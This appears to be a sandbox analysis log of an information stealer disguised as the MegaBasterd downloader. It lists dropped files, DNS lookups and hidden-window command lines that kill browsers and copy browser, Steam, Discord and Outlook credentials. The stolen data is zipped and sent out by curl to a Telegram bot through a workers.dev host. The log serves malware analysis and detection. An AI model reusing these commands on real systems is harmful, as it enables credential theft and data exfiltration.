Technical Information
- '<SYSTEM32>\taskkill.exe' /F /IM chrome.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msedge.exe
- '<SYSTEM32>\taskkill.exe' /F /IM brave.exe
- <SYSTEM32>\runtimebroker.exe
- msedge.exe
- %TEMP%\rarsfx0\megabasterd.exe
- %TEMP%\rarsfx0\megabasterd_8.57.jar
- %TEMP%\6a59c7b4\debug.log
- %TEMP%\6a59c7b4\collect\ip_geo.txt
- %TEMP%\6a59c7b4\collect\info.txt
- %TEMP%\6a59c7b4\collect\screenshot.png
- nul
- %TEMP%\6a59c7b4\discord.ps1
- %TEMP%\6a59c7b4\collect\tokens_debug.log
- %TEMP%\6a59c7b4\collect\discord_tokens.txt
- %TEMP%\6a59c7b4\collect\valid_tokens.txt
- %TEMP%\6a59c7b4\convert.ps1
- %TEMP%\6a59c7b4\convert_pass.ps1
- %TEMP%\6a59c7b4\outlook_cred.ps1
- %TEMP%\6a59c7b4\credentials_temp.txt
- %TEMP%\6a59c7b4\data\discord_tokens.txt
- %TEMP%\6a59c7b4\data\info.txt
- %TEMP%\6a59c7b4\data\screenshot.png
- %TEMP%\6a59c7b4\data\tokens_debug.log
- %TEMP%\6a59c7b4\data\valid_tokens.txt
- %TEMP%\av_tmp.txt
- %TEMP%\cnt_tmp.txt
- %TEMP%\6a59c7b4\getsize.ps1
- %TEMP%\6a59c7b4\size.txt
- %TEMP%\6a59c7b4\1kalmig2.zip
- %TEMP%\6a59c7b4\msg.txt
- %TEMP%\6a59c7b4\send_text.ps1
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-4226853953-3309226944-3078887307-1000\83aa4cc77f591dfc2374580bbd95f6ba_8cf7b530-613e-439b-a8c5-ccfc0e745400
- %TEMP%\sqlite-3.43.0.0-87715422-2958-4f41-bae7-de56a6d5753c-sqlitejdbc.dll
- %HOMEPATH%\.megabasterd8.57\megabasterd.db-journal
- %HOMEPATH%\.megabasterd8.57\megabasterd.db
- %HOMEPATH%\.megabasterd8.57\megabasterd.db-shm
- %HOMEPATH%\.megabasterd8.57\megabasterd.db-wal
- %TEMP%\+~jf7524104514588078379.tmp
- %TEMP%\6a59c7b4\collect\ip_geo.txt
- %TEMP%\6a59c7b4\discord.ps1
- %TEMP%\6a59c7b4\convert.ps1
- %TEMP%\6a59c7b4\convert_pass.ps1
- %TEMP%\6a59c7b4\outlook_cred.ps1
- %TEMP%\6a59c7b4\credentials_temp.txt
- %TEMP%\av_tmp.txt
- %TEMP%\cnt_tmp.txt
- %TEMP%\6a59c7b4\getsize.ps1
- %TEMP%\6a59c7b4\size.txt
- %TEMP%\6a59c7b4\1kalmig2.zip
- %TEMP%\6a59c7b4\send_text.ps1
- %TEMP%\6a59c7b4\msg.txt
- %TEMP%\rarsfx0\megabasterd.exe
- %HOMEPATH%\.megabasterd8.57\megabasterd.db-journal
- %TEMP%\cnt_tmp.txt
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
- 'x1.#.lencr.org':80
- 'ip##pi.com':80
- 'he########d.wubejack.workers.dev':443
- http://x1.#.lencr.org/
- http://ip##pi.com/json
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
- 'he########d.wubejack.workers.dev':443
- 'localhost':49699
- DNS ASK gi##ub.com
- DNS ASK re#########ets.githubusercontent.com
- DNS ASK x1.#.lencr.org
- DNS ASK ip##pi.com
- DNS ASK he########d.wubejack.workers.dev
- ClassName: 'Edit' WindowName: ''
- ClassName: '' WindowName: ''
- '%TEMP%\rarsfx0\megabasterd.exe'
- '<SYSTEM32>\runtimebroker.exe' all -o %TEMP%\\6a59c7b4\output
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe'
- '<SYSTEM32>\cmd.exe' /c curl -s http://ip-api.com/json > "%TEMP%\\6a59c7b4\collect\ip_geo.txt"
- '<SYSTEM32>\curl.exe' -s http://ip-api.com/json
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms; $screen=[System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap=New-Object System.Drawing.Bitmap $screen.Width,$screen....
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-Type -AssemblyName System.Windows.Forms; $screen=[System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap=New-Object System.Drawing.Bitmap $screen.Width,$screen.Height; $graph...
- '<SYSTEM32>\cmd.exe' /c robocopy "%ProgramFiles(x86)%\Steam\config" "%TEMP%\\6a59c7b4\collect\Steam\config" /E /R:0 /W:0 >nul
- '<SYSTEM32>\robocopy.exe' "%ProgramFiles(x86)%\Steam\config" "%TEMP%\\6a59c7b4\collect\Steam\config" /E /R:0 /W:0
- '<SYSTEM32>\cmd.exe' /c robocopy "%ProgramFiles(x86)%\Steam\userdata" "%TEMP%\\6a59c7b4\collect\Steam\userdata" /E /R:0 /W:0 >nul
- '<SYSTEM32>\robocopy.exe' "%ProgramFiles(x86)%\Steam\userdata" "%TEMP%\\6a59c7b4\collect\Steam\userdata" /E /R:0 /W:0
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\discord.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\discord.ps1"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\convert.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\convert.ps1"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\convert_pass.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\convert_pass.ps1"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\outlook_cred.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\outlook_cred.ps1"
- '<SYSTEM32>\cmd.exe' /c robocopy "%TEMP%\\6a59c7b4\output" "%TEMP%\\6a59c7b4\data\Browsers" /E /R:0 /W:0 >nul
- '<SYSTEM32>\robocopy.exe' "%TEMP%\\6a59c7b4\output" "%TEMP%\\6a59c7b4\data\Browsers" /E /R:0 /W:0
- '<SYSTEM32>\cmd.exe' /c robocopy "%TEMP%\\6a59c7b4\collect" "%TEMP%\\6a59c7b4\data" /E /R:0 /W:0 >nul
- '<SYSTEM32>\robocopy.exe' "%TEMP%\\6a59c7b4\collect" "%TEMP%\\6a59c7b4\data" /E /R:0 /W:0
- '<SYSTEM32>\cmd.exe' /c wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname > "%TEMP%\av_tmp.txt" 2>nul
- '<SYSTEM32>\wbem\wmic.exe' /namespace:\\root\securitycenter2 path antivirusproduct get displayname
- '<SYSTEM32>\cmd.exe' /c powershell -Command "(Get-WmiObject -Class SoftwareLicensingProduct | Where-Object {$_.PartialProductKey -and $_.ApplicationID -eq '55c92734-d682-4d71-983e-d6ec3f16059f'}).OA3xOriginalProduc...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "(Get-WmiObject -Class SoftwareLicensingProduct | Where-Object {$_.PartialProductKey -and $_.ApplicationID -eq '55c92734-d682-4d71-983e-d6ec3f16059f'}).OA3xOriginalProductKey"
- '<SYSTEM32>\cmd.exe' /c dir /s /b "%TEMP%\\6a59c7b4\data\Browsers" 2>nul | find /c /v "" > "%TEMP%\cnt_tmp.txt"
- '<SYSTEM32>\cmd.exe' /S /D /c" dir /s /b "%TEMP%\\6a59c7b4\data\Browsers" 2>nul"
- '<SYSTEM32>\find.exe' /c /v ""
- '<SYSTEM32>\cmd.exe' /c dir /s /b "%TEMP%\\6a59c7b4\data\Steam" 2>nul | find /c /v "" > "%TEMP%\cnt_tmp.txt"
- '<SYSTEM32>\cmd.exe' /S /D /c" dir /s /b "%TEMP%\\6a59c7b4\data\Steam" 2>nul"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\getsize.ps1" > "%TEMP%\\6a59c7b4\size.txt"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\getsize.ps1"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Compress-Archive -Path '%TEMP%\\6a59c7b4\data\*' -DestinationPath '%TEMP%\\6a59c7b4\1KaLmIg2.zip' -Force"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Compress-Archive -Path '%TEMP%\\6a59c7b4\data\*' -DestinationPath '%TEMP%\\6a59c7b4\1KaLmIg2.zip' -Force"
- '<SYSTEM32>\cmd.exe' /c curl -F chat_id=7593646943 -F document=@"%TEMP%\\6a59c7b4\1KaLmIg2.zip" "https://hello-world.wubejack.workers.dev/bot8927863657:AAGEhTuGL1Py-YTZEaGdxAcn_cSswbBOpN0/sendDocument" --insecure -...
- '<SYSTEM32>\curl.exe' -F chat_id=7593646943 -F document=@"%TEMP%\\6a59c7b4\1KaLmIg2.zip" "https://hello-world.wubejack.workers.dev/bot8927863657:AAGEhTuGL1Py-YTZEaGdxAcn_cSswbBOpN0/sendDocument" --insecure --max-tim...
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\send_text.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\send_text.ps1"
- '<SYSTEM32>\cmd.exe' /c cmd /c del /f /q "%TEMP%\RarSFX0\Megabasterd.exe"
- '<SYSTEM32>\cmd.exe' /c del /f /q "%TEMP%\RarSFX0\Megabasterd.exe"
- '%ProgramFiles%\java\jre1.8.0_77\bin\javaw.exe' -jar "%TEMP%\RarSFX0\MegaBasterd_8.57.jar"
- '<SYSTEM32>\cmd.exe' /c curl -s http://ip-api.com/json > "%TEMP%\\6a59c7b4\collect\ip_geo.txt"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms; $screen=[System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap=New-Object System.Drawing.Bitmap $screen.Width,$screen....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c robocopy "%ProgramFiles(x86)%\Steam\config" "%TEMP%\\6a59c7b4\collect\Steam\config" /E /R:0 /W:0 >nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c robocopy "%ProgramFiles(x86)%\Steam\userdata" "%TEMP%\\6a59c7b4\collect\Steam\userdata" /E /R:0 /W:0 >nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\discord.ps1"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\convert.ps1"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\convert_pass.ps1"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\outlook_cred.ps1"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c robocopy "%TEMP%\\6a59c7b4\output" "%TEMP%\\6a59c7b4\data\Browsers" /E /R:0 /W:0 >nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c robocopy "%TEMP%\\6a59c7b4\collect" "%TEMP%\\6a59c7b4\data" /E /R:0 /W:0 >nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname > "%TEMP%\av_tmp.txt" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -Command "(Get-WmiObject -Class SoftwareLicensingProduct | Where-Object {$_.PartialProductKey -and $_.ApplicationID -eq '55c92734-d682-4d71-983e-d6ec3f16059f'}).OA3xOriginalProduc...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c dir /s /b "%TEMP%\\6a59c7b4\data\Browsers" 2>nul | find /c /v "" > "%TEMP%\cnt_tmp.txt"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c dir /s /b "%TEMP%\\6a59c7b4\data\Steam" 2>nul | find /c /v "" > "%TEMP%\cnt_tmp.txt"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\getsize.ps1" > "%TEMP%\\6a59c7b4\size.txt"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Compress-Archive -Path '%TEMP%\\6a59c7b4\data\*' -DestinationPath '%TEMP%\\6a59c7b4\1KaLmIg2.zip' -Force"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c curl -F chat_id=7593646943 -F document=@"%TEMP%\\6a59c7b4\1KaLmIg2.zip" "https://hello-world.wubejack.workers.dev/bot8927863657:AAGEhTuGL1Py-YTZEaGdxAcn_cSswbBOpN0/sendDocument" --insecure -...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "%TEMP%\\6a59c7b4\send_text.ps1"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cmd /c del /f /q "%TEMP%\RarSFX0\Megabasterd.exe"' (with hidden window)